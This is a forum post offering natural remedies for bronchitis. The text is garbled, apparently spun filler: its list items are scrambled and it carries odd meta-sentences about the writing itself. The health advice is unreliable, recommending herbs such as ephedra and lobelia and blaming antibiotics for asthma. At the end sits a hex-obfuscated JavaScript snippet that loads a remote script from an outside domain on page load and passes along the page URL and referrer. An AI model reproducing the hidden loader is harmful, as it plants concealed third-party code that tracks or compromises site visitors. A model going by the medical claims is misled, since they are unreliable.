5 Natural Ways to Control Bronchitis

View previous topic View next topic Go down

5 Natural Ways to Control Bronchitis

Post by Admin on Tue Sep 27, 2016 8:12 am

Bronchitis Bacterial, Bronchitis Natural Remedies, 5

Bronchitis is considered to be one among the most common respiratory disorders in the world. Infants, people with a weak respiratory system, children, old people, smokers, and people living in highly polluted atmospheres are vulnerable to this disorder. It constitutes the last stage of infection of the upper respiratory tract. People commonly contract this disorder during the cold months of the winter. Fortunately, there are a number of natural remedies for bronchitis.

• Take a long, hot shower or soak in a bathtub filled with hot, steaming water. 3.
  • Wrap a towel around your head and inhale the fumes from a pot or a sink filled with hot, steaming water.
  • Maintain a small distance between the hot pot or sink so that you don't get burnt.

Although it is easy to treat acute bronchitis, a lot of care is required for complete recovery. If neglected or mistreated, acute bronchitis will lead to chronic bronchitis, a condition that can permanently damage your pulmonary system and affect your day-to-day life. It is therefore crucial that you tackle it in its early stages by making use of natural remedies for bronchitis. Patience was exercised in this article on Bronchitis Condition. Without patience, it would not have been possible to write extensively on Bronchitis Condition.

Symptoms and Diagnosis

Only laboratory tests can tell you whether bronchitis is bacterial, viral, or fungal. Therefore, it is of utmost importance that you visit a doctor as soon as you suspect bronchitis. Physicians will properly diagnose your condition with the help of laboratory test results.

• The following is a list of natural remedies for bronchitis that you can use: 1.
  • If you are a cigarette smoker, quit smoking for good.
  • In addition, avoid smoke from other smokers.

Do this Before You Go to Bed

Apply hot, damp towels to your chest and back for many minutes. Dry yourself and change into warm clothes. 5. Avoid dusty, smoky, polluted places as these will worsen your condition. We have actually followed a certain pattern while writing on Bronchitis Condition. We have used simple words and sentences to facilitate easy understanding for the reader.

Natural Remedies

There are a number of natural remedies for bronchitis. They can, at least, be used to provide relief from bronchitis symptoms. However, these natural remedies for bronchitis cannot be taken on their own. A combination of these remedies with the usual, conventional medication constitutes the ideal treatment plan.

Bronchitis Natural Treatments | Health Care | Pinterest

These are the symptoms of acute bronchitis--hacking cough, contracting sensation around the areas of the eye, pain in the chest, breathlessness, and headaches. It is easy to treat viral bronchitis, especially with the help of natural remedies. The treatment plan includes plenty of rest, fluid intake, use of a humidifier inside your house. If you do not have a humidifier, simply hang wet blankets or towels inside your house.

An ideal combination of natural remedies for bronchitis with the usual medication can help you effectively treat this disorder without suffering from any side effects. Consequently, it can help you live a healthier, more productive life.

Addition to the Above Natural Remedies for Bronchitis,

Consider the use of vitamin supplements to give your body the required energy to drive away the bacteria or virus. Other alternative methods you could use to treat bronchitis successfully include acupuncture, salt therapy, acupuncture, hydrotherapy, and even oil massages. Embarassed

Bronchitis Normally Follows Bacterial or Viral Infection

Most cases of bronchitis are caused by viral infection. Sometimes bacteria are responsible for this condition, and in rare cases, fungal infection can lead to bronchitis. Natural remedies for bronchitis are available, whether it is acute or short-term bronchitis or chronic or long-term bronchitis.

Chronic bronchitis is a very common respiratory disease that involves inflammation and infection of the bronchial tubes, mucosal membranes and tissues. The disease is manifested by an overproduction of mucus that results in temporary obstruction of the airways. In the first stages of chronic bronchitis, the disease only affects the major airways, generating milder and less persistent symptoms. However, in more advanced stages of chronic bronchitis all airways are affected, preventing the proper oxygenation of the lungs due to pronounced obstruction of the respiratory tract. As the disease progresses further, chronic bronchitis sufferers may develop serious complications at the level of the lungs. Complicated forms of chronic bronchitis often involve emphysema or pneumonia.

More informations about bronchitis symptoms or asthmatic bronchitis can be found by visiting ***** About the Author: Revision is very important when writing or speaking about a topic. We had a lot of drafting to do to come to this final product on Chronic Bronchitis Smokers. Surprised.

Although there are various causes of chronic bronchitis, the disease is often linked with cigarette smoking. Recent studies indicate that both active and passive smoking greatly contribute to the occurrence of chronic bronchitis. In addition, smoking facilitates the progression of the disease and decreases the potency of specific medications. Smoking weakens the natural defenses of the respiratory tract, facilitates the proliferation of bacteria and slows down the healing of the soft tissues, membranes and organs involved in breathing. After reading what was written here, don't you get the impression that you had actually heard about these points sometime back. Think back and think deeply about Chronic Bronchitis Smokers Laughing

Chronic bronchitis symptoms blood for causing the so called "smoker's cough". This persistent, highly productive cough has a pronounced recurrent character. In the incipient phase of chronic bronchitis, this symptom usually occurs in the morning and clears within a few hours. As the disease progresses, "the smoker's cough" is ongoing and it rarely ameliorates without the aid of medical treatment. When the cough produces blood or yellowish mucus, it is a major indicator of complications, suggesting the spreading of the disease at pulmonary level.

Recent statistics reveal that there are more than 14 million people with chronic bronchitis in the United States. Around 17 percent of overall chronic bronchitis cases are diagnosed in regular smokers while around 12 percent of cases are diagnosed in former smokers. Studies in the field suggest that regular smokers are 85 percent more exposed to developing chronic bronchitis than non-smokers. The risk of developing chronic bronchitis is directly proportional with the number of cigarettes smoked. We tried to create as much matter for your understanding when writing on Bronchitis Often. We do hope that the matter provided here is sufficient to you.

Smokers that Suffer from Chronic Bronchitis are Advised to Quit Smoking for Good

Although it may take a while until the respiratory tissues and organs are completely regenerated and cured from the effects of smoking, timely quitting this self-destructive habit can prevent the occurrence of further complications. Nevertheless, the absence of smoking speeds up the process of recovery from chronic bronchitis, minimizing the risks of relapse.

Had a Very Bad Bout of Bronchitis Years Ago, Which Led to a Chronic Asthma Condition

I lost 2 stone in weight over a 2 month period and I had little idea of how to deal with the debilitating illness...I was frequently struggling to be able to breathe. It's not something I would like to go through again, but it took me the best part of two years to get to grips with the condition. Shocked

• Please feel free to let me have any tips of your own.
  • I have a keen interest in using natural remedies and have had years of experience in using herbs and homeopathy. Smile
  • The first step is to remove wheat and milk products from the diet (before you panic, this is only a temporary measure).
  • Why you ask?
  • Because when you have a cold or bronchitis the body produces more mucus and you do not want to add to this by eating mucus producing foods.
  • I know some of you will be sceptical, but what have you got to lose...just try it and see.
  • Patience was exercised in this article on Bronchitis.
  • Without patience, it would not have been possible to write extensively on Bronchitis.

Through Experience and from Reading Many Health Books I Now Know Why My Colds Developed

Into bronchitis. I know it's a damn nuisance but we cannot avoid colds. However, we can make life much easier for ourselves. We have actually followed a certain pattern while writing on Cold Bronchitis. We have used simple words and sentences to facilitate easy understanding for the reader.

• As a child I often had winter colds that developed into bronchitis, with the inevitable regular visit to the doctor.
  • Every time antibiotics were prescribed, why I do not know, but I believe this was what led to me developing asthma later in life.
  • Colds are caused by viruses and are not killed by antibiotics, which kill bacteria, all bacteria even the necessary one's that help with digestion.
  • In addition to weakening the digestive system the bodies immune system is also compromised as it has lost a vital ally in fighting yeast and fungi.
  • These are always present in the body but the good gut bacteria keep them in check.
  • Mainstream medicine now recognises the effect Candida can have on a compromised immune system, although you might still counter some scepticism.
  • Alternative medicine has known about it for a long time.
  • If you do have to use antibiotics then it is sensible to repopulate your gut with good bacteria.
  • There are now plenty of probiotic products available, many advertised on the TV.

Also try adding garlic, onions, ginger, chillies, cloves and liquorice (not the sweets, but do not take if you have high blood pressure) to your diet, as they all act as decongestants. The following herbs are also very useful: astragalus, coltsfoot, echinacea, elderberry, elecampane, ephedra, eucalyptus, fenugreek, gingko, goldenseal, lobelia, mullein oil and reishi. Penetration into the world of Cold Bronchitis proved to be our idea in this article. Read the article and see if we have succeeded in this or not!

var c2="bronchitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

View user profile http://gerrylamb.forumotion.co.nz

Back to top Go down

View previous topic View next topic Back to top